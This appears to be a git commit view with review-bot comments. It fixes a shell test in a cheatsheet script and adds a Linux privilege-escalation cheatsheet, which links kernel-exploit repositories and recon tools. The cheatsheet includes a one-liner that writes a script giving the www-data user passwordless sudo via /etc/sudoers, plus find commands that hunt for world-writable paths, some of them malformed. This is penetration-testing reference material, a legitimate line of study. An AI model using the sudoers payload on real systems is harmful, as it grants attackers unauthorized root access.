Hans Martin %!s(int64=5) %!d(string=hai) anos
pai
achega
a8fd6f1b75

+ 1 - 1
cheat.sh

@@ -19,7 +19,7 @@ function usage {
 
 # Set the path to the cheatncheck repo here
 
-if [ $CHEAT = "" ]; then
+if [ "$CHEAT" = "" ]; then
     cheatsheets="$HOME/documents/cheatsheets/"
 else
     cheatsheets="$CHEAT"
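Review bot: The new test `if [ "$CHEAT" = "" ]; then` fixes the word-splitting error, but it would still abort on an unset CHEAT if the script is ever run with `set -u`, and a `-z` test states the intent more directly: `if [ -z "${CHEAT:-}" ]; then`. The comment above it, "Set the path to the cheatncheck repo here", could also say that the CHEAT environment variable overrides the default, e.g. `# Cheatsheet directory: $CHEAT if set, otherwise the default below`. In the visible lines the environment value is assigned to `cheatsheets` unchecked; unless a check exists further down, `[ -d "$cheatsheets" ]` after the block would fail early on a wrong path. The `if` block closes outside this hunk.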

+ 52 - 0
cheatsheets/security/linux/linux-privilege-escalation.md

@@ -0,0 +1,52 @@
+---
+title: Linux Privilege Escalation
+categories: [cheatsheets]
+tags: [topic]
+---
+
+# Linux Privilege Escalation
+
+* interesting article: https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
+
+## Kernel Explotis
+
+* Get the version of the Linux Kernel with `uname -a`
+* Use searchsploit e.g. and search for an exploit
+* Use Exploit-Suggestor (https://github.com/jondonas/linux-exploit-suggester-2)
+
+
+### Following Github Repos could be useful
+
+* (source) https://github.com/SecWiki/linux-kernel-exploits
+* (precompiled) https://github.com/pythonmaster41/Go-For-OSCP/
+* (precompiled) https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/
+* (source) https://github.com/lucyoa/kernel-exploits
+
+
+## Information Gathering
+
+### Automated Recon
+
+* LinEnum (https://github.com/rebootuser/LinEnum)
+* LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker)
+*
+
+
+### Useful Snippets
+
+* When getting a root user to run a script:
+
+```
+echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
+```
+
+* Word Writeable Stuff
+```
+find / -writable -type d 2>/dev/null      # world-writeable folders
+find / -perm -222 -type d 2>/dev/null     # world-writeable folders
+find / -perm -o w -type d 2>/dev/null     # world-writeable folders
+
+find / -perm -o w -type f 2>/dev/null     # world-writeable files
+find / -perm -o x -type d 2>/dev/null     # world-executable folders
+```
+
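Review bot: In the last fenced block, GNU find should reject `-perm -o w` as an invalid mode, and because stderr goes to `/dev/null` the three commands using it would print nothing instead of failing visibly. The symbolic form needs an operator: `find / -perm -o+w -type d 2>/dev/null`, and likewise `-o+w -type f` and `-o+x -type d`. The comment "world-writeable folders" is also inaccurate for the first two lines, since `-writable` matches what the current user can write and `-perm -222` requires the write bit for user, group and other together; comments such as `# folders writable by the current user` and `# folders writable by user, group and other` would match what the commands do. The headings `Kernel Explotis` and `Word Writeable Stuff` are misspelled, and the empty `*` bullet under Automated Recon can be dropped.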

+ 0 - 0
cheatsheets/security/windows/windows-local-privesc.md → cheatsheets/security/windows/windows-local-privilege-escalation.md